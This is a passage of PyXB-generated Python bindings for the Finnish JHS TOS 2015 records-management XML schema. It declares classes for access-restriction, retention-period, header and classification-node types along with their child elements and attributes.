    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}JulkisuusluokkaKoodi uses Python identifier JulkisuusluokkaKoodi
    __JulkisuusluokkaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), 'JulkisuusluokkaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115JulkisuusluokkaKoodi', False, None, )

    JulkisuusluokkaKoodi = property(__JulkisuusluokkaKoodi.value, __JulkisuusluokkaKoodi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapitoAikaArvo uses Python identifier SalassapitoAikaArvo
    __SalassapitoAikaArvo = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), 'SalassapitoAikaArvo', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapitoAikaArvo', False, None, )

    SalassapitoAikaArvo = property(__SalassapitoAikaArvo.value, __SalassapitoAikaArvo.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapitoPerusteTeksti uses Python identifier SalassapitoPerusteTeksti
    __SalassapitoPerusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), 'SalassapitoPerusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapitoPerusteTeksti', False, None, )

    SalassapitoPerusteTeksti = property(__SalassapitoPerusteTeksti.value, __SalassapitoPerusteTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapidonLaskentaperusteTeksti uses Python identifier SalassapidonLaskentaperusteTeksti
    __SalassapidonLaskentaperusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), 'SalassapidonLaskentaperusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapidonLaskentaperusteTeksti', False, None, )

    SalassapidonLaskentaperusteTeksti = property(__SalassapidonLaskentaperusteTeksti.value, __SalassapidonLaskentaperusteTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SuojaustasoKoodi uses Python identifier SuojaustasoKoodi
    __SuojaustasoKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), 'SuojaustasoKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SuojaustasoKoodi', False, None, )

    SuojaustasoKoodi = property(__SuojaustasoKoodi.value, __SuojaustasoKoodi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TurvallisuusluokkaKoodi uses Python identifier TurvallisuusluokkaKoodi
    __TurvallisuusluokkaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), 'TurvallisuusluokkaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TurvallisuusluokkaKoodi', False, None, )

    TurvallisuusluokkaKoodi = property(__TurvallisuusluokkaKoodi.value, __TurvallisuusluokkaKoodi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HenkilotietoluonneKoodi uses Python identifier HenkilotietoluonneKoodi
    __HenkilotietoluonneKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), 'HenkilotietoluonneKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HenkilotietoluonneKoodi', False, None, )

    HenkilotietoluonneKoodi = property(__HenkilotietoluonneKoodi.value, __HenkilotietoluonneKoodi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )

    # Property doc string is the verbatim XSD annotation (runtime data, Finnish).
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __JulkisuusluokkaKoodi.name() : __JulkisuusluokkaKoodi,
        __SalassapitoAikaArvo.name() : __SalassapitoAikaArvo,
        __SalassapitoPerusteTeksti.name() : __SalassapitoPerusteTeksti,
        __SalassapidonLaskentaperusteTeksti.name() : __SalassapidonLaskentaperusteTeksti,
        __SuojaustasoKoodi.name() : __SuojaustasoKoodi,
        __TurvallisuusluokkaKoodi.name() : __TurvallisuusluokkaKoodi,
        __HenkilotietoluonneKoodi.name() : __HenkilotietoluonneKoodi,
        __Laajennos.name() : __Laajennos
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.kayttorajoitusTiedotTyyppi = kayttorajoitusTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'kayttorajoitusTiedotTyyppi', kayttorajoitusTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysaikaTiedotTyyppi with content type ELEMENT_ONLY
class sailytysaikaTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type sailytysaikaTiedotTyyppi ('retention period
    information' type), ELEMENT_ONLY content.

    Children: SailytysajanPituusArvo, SailytysajanPerusteTeksti,
    SailytysajanLaskentaperusteTeksti (single occurrence each) and repeatable
    Laajennos extension elements, per the declaration flags below.
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysaikaTiedotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanPituusArvo uses Python identifier SailytysajanPituusArvo
    __SailytysajanPituusArvo = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), 'SailytysajanPituusArvo', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanPituusArvo', False, None, )

    SailytysajanPituusArvo = property(__SailytysajanPituusArvo.value, __SailytysajanPituusArvo.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanPerusteTeksti uses Python identifier SailytysajanPerusteTeksti
    __SailytysajanPerusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), 'SailytysajanPerusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanPerusteTeksti', False, None, )

    SailytysajanPerusteTeksti = property(__SailytysajanPerusteTeksti.value, __SailytysajanPerusteTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytysajanLaskentaperusteTeksti uses Python identifier SailytysajanLaskentaperusteTeksti
    __SailytysajanLaskentaperusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), 'SailytysajanLaskentaperusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytysajanLaskentaperusteTeksti', False, None, )

    SailytysajanLaskentaperusteTeksti = property(__SailytysajanLaskentaperusteTeksti.value, __SailytysajanLaskentaperusteTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_sailytysaikaTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )

    # Property doc string is the verbatim XSD annotation (runtime data, Finnish).
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __SailytysajanPituusArvo.name() : __SailytysajanPituusArvo,
        __SailytysajanPerusteTeksti.name() : __SailytysajanPerusteTeksti,
        __SailytysajanLaskentaperusteTeksti.name() : __SailytysajanLaskentaperusteTeksti,
        __Laajennos.name() : __Laajennos
    })
    # No XML attributes declared on this type.
    _AttributeMap.update({
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.sailytysaikaTiedotTyyppi = sailytysaikaTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'sailytysaikaTiedotTyyppi', sailytysaikaTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosTiedotTyyppi with content type ELEMENT_ONLY
class TosTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Binding for complex type TosTiedotTyyppi (TOS header information),
    ELEMENT_ONLY content.

    Carries status, version, author/modifier/approver names and dates,
    validity dates, a contact person, a Nimeke (title) child, and repeatable
    Laajennos extension elements. Declares one required XML attribute, 'id'
    (typed idTyyppi, declared elsewhere in this module).
    """
    # No simple-type facet: content consists of child elements only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Qualified name of this type in the TOS 2015-01-15 namespace.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TosTiedotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TilaKoodi uses Python identifier TilaKoodi
    __TilaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), 'TilaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TilaKoodi', False, None, )

    TilaKoodi = property(__TilaKoodi.value, __TilaKoodi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosVersio uses Python identifier TosVersio
    __TosVersio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), 'TosVersio', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TosVersio', False, None, )

    TosVersio = property(__TosVersio.value, __TosVersio.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LisatiedotTeksti uses Python identifier LisatiedotTeksti
    __LisatiedotTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), 'LisatiedotTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LisatiedotTeksti', False, None, )

    LisatiedotTeksti = property(__LisatiedotTeksti.value, __LisatiedotTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
    __OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )

    OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
    __LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )

    LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
    __LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )

    LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
    __MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )

    MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
    __MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )

    MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
    __HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )

    HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
    __HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )

    HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
    __VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )

    VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
    __VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )

    VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}YhteyshenkiloNimi uses Python identifier YhteyshenkiloNimi
    __YhteyshenkiloNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), 'YhteyshenkiloNimi', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115YhteyshenkiloNimi', False, None, )

    YhteyshenkiloNimi = property(__YhteyshenkiloNimi.value, __YhteyshenkiloNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )

    # Property doc string is the verbatim XSD annotation (runtime data, Finnish).
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Nimeke uses Python identifier Nimeke
    __Nimeke = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), 'Nimeke', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Nimeke', False, None, )

    Nimeke = property(__Nimeke.value, __Nimeke.set, None, None)

    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
    # NOTE(review): required attribute; 'id' intentionally shadows the builtin
    # because the schema attribute is named 'id' (generated code).
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_TosTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
    __id._DeclarationLocation = None
    __id._UseLocation = None

    id = property(__id.value, __id.set, None, None)

    # Wire element declarations into pyxb's content-model lookup table.
    _ElementMap.update({
        __TilaKoodi.name() : __TilaKoodi,
        __TosVersio.name() : __TosVersio,
        __LisatiedotTeksti.name() : __LisatiedotTeksti,
        __OrganisaatioNimi.name() : __OrganisaatioNimi,
        __LaatijaNimi.name() : __LaatijaNimi,
        __LaadittuPvm.name() : __LaadittuPvm,
        __MuokkaajaNimi.name() : __MuokkaajaNimi,
        __MuokattuPvm.name() : __MuokattuPvm,
        __HyvaksyjaNimi.name() : __HyvaksyjaNimi,
        __HyvaksyttyPvm.name() : __HyvaksyttyPvm,
        __VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
        __VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
        __YhteyshenkiloNimi.name() : __YhteyshenkiloNimi,
        __Laajennos.name() : __Laajennos,
        __Nimeke.name() : __Nimeke
    })
    # Register the single required attribute.
    _AttributeMap.update({
        __id.name() : __id
    })
# Register the binding in the module registry and namespace category map.
_module_typeBindings.TosTiedotTyyppi = TosTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'TosTiedotTyyppi', TosTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokkaTyyppi with content type ELEMENT_ONLY
class luokkaTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokkaTyyppi with content type ELEMENT_ONLY

    PyXB-generated binding for a classification node ("luokka") of the TOS
    information-control plan.  Do not edit by hand; regenerate from the XSD.
    Each private ``__X`` attribute declares a child element or attribute; the
    matching public ``property`` exposes it, and ``_ElementMap``/``_AttributeMap``
    register the declarations for PyXB's validation machinery.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'luokkaTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TilaKoodi uses Python identifier TilaKoodi
    __TilaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), 'TilaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115TilaKoodi', False, None, )
    TilaKoodi = property(__TilaKoodi.value, __TilaKoodi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OsaVersio uses Python identifier OsaVersio
    __OsaVersio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), 'OsaVersio', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115OsaVersio', False, None, )
    OsaVersio = property(__OsaVersio.value, __OsaVersio.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Luokitustunnus uses Python identifier Luokitustunnus
    __Luokitustunnus = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), 'Luokitustunnus', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Luokitustunnus', False, None, )
    Luokitustunnus = property(__Luokitustunnus.value, __Luokitustunnus.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LuokitusKuvausTeksti uses Python identifier LuokitusKuvausTeksti
    __LuokitusKuvausTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), 'LuokitusKuvausTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LuokitusKuvausTeksti', False, None, )
    LuokitusKuvausTeksti = property(__LuokitusKuvausTeksti.value, __LuokitusKuvausTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
    __OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
    OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
    __LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
    LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
    __LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
    LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
    __MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
    MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
    __MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
    MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
    __HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
    HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
    __HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
    HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
    __VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
    VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
    __VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
    VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    # (repeatable: 5th positional argument True marks this declaration as plural)
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
    # Property docstring is Finnish (from the schema annotation): "Generic
    # extension element. Extensions enable organisation-specific elements."
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Nimeke uses Python identifier Nimeke
    __Nimeke = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), 'Nimeke', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115Nimeke', False, None, )
    Nimeke = property(__Nimeke.value, __Nimeke.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KasittelyprosessiTiedot uses Python identifier KasittelyprosessiTiedot
    __KasittelyprosessiTiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), 'KasittelyprosessiTiedot', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115KasittelyprosessiTiedot', False, None, )
    KasittelyprosessiTiedot = property(__KasittelyprosessiTiedot.value, __KasittelyprosessiTiedot.set, None, None)
    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
